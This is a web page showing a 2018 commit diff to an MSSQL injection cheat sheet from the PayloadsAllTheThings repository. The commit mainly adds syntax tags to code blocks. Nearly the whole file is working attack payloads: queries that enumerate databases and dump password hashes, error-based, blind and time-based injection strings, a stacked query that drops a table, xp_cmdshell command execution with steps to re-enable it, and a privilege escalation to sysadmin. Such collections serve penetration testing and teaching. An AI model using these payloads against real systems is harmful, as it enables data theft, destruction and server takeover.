gitea-mirror/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2026-01-09 03:40:44 -08:00
Code Issues Packages Projects Releases Wiki Activity

SQL Cheatsheets - Refactoring part 1

Browse Source
This commit is contained in:
Swissky
2018-05-16 23:33:14 +02:00
parent 81eebeaea2
commit f1cb7ce50e
7 changed files with 122 additions and 72 deletions
Download Patch File Download Diff File Expand all files Collapse all files

32
SQL injection/MSSQL Injection.md
View File

@@ -1,23 +1,23 @@
# MSSQL Injection
## MSSQL version
```
```sql
SELECT @@version
```
## MSSQL database name
```
```sql
SELECT DB_NAME()
```
## MSSQL List Databases
```
```sql
SELECT name FROM master..sysdatabases;
SELECT DB_NAME(N); for N = 0, 1, 2,
```
## MSSQL List Column
```
```sql
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = mytable); for the current DB only
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=sometable; list colum names and types for master..sometable
@@ -25,7 +25,7 @@ SELECT table_catalog, column_name FROM information_schema.columns
```
## MSSQL List Tables
```
```sql
SELECT name FROM master..sysobjects WHERE xtype = U; use xtype = V for views
SELECT name FROM someotherdb..sysobjects WHERE xtype = U;
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=sometable; list colum names and types for master..sometable
@@ -35,7 +35,7 @@ SELECT table_catalog, table_name FROM information_schema.columns
## MSSQL User Password
```
```sql
MSSQL 2000:
SELECT name, password FROM master..sysxlogins
SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins (Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.)
@@ -46,7 +46,7 @@ SELECT name + - + master.sys.fn_varbintohexstr(password_hash) from master.
```
## MSSQL Error based
```
```sql
For integer inputs : convert(int,@@version)
For integer inputs : cast((SELECT @@version) as int)
@@ -56,7 +56,7 @@ For string inputs : ' + cast((SELECT @@version) as int) + '
## MSSQL Blind based
```
```sql
SELECT @@version WHERE @@version LIKE '%12.0.2000.8%'
WITH data AS (SELECT (ROW_NUMBER() OVER (ORDER BY message)) as row,* FROM log_table)
@@ -64,22 +64,30 @@ SELECT message FROM data WHERE row = 1 and message like 't%'
```
## MSSQL Time based
```
```sql
ProductID=1;waitfor delay '0:0:10'--
ProductID=1);waitfor delay '0:0:10'--
ProductID=1';waitfor delay '0:0:10'--
ProductID=1');waitfor delay '0:0:10'--
ProductID=1));waitfor delay '0:0:10'--
IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' comment: --
```
## MSSQL Stacked Query
Use a semi-colon ";" to add another query
```sql
ProductID=1; DROP members--
```
## MSSQL Command execution
```
```sql
EXEC xp_cmdshell "net user";
EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'
EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1'
```
If you need to reactivate xp_cmdshell (disabled by default in SQL Server 2005)
```
```sql
EXEC sp_configure 'show advanced options',1
RECONFIGURE
EXEC sp_configure 'xp_cmdshell',1
@@ -87,7 +95,7 @@ RECONFIGURE
```
## MSSQL Make user DBA (DB admin)
```
```sql
EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;
```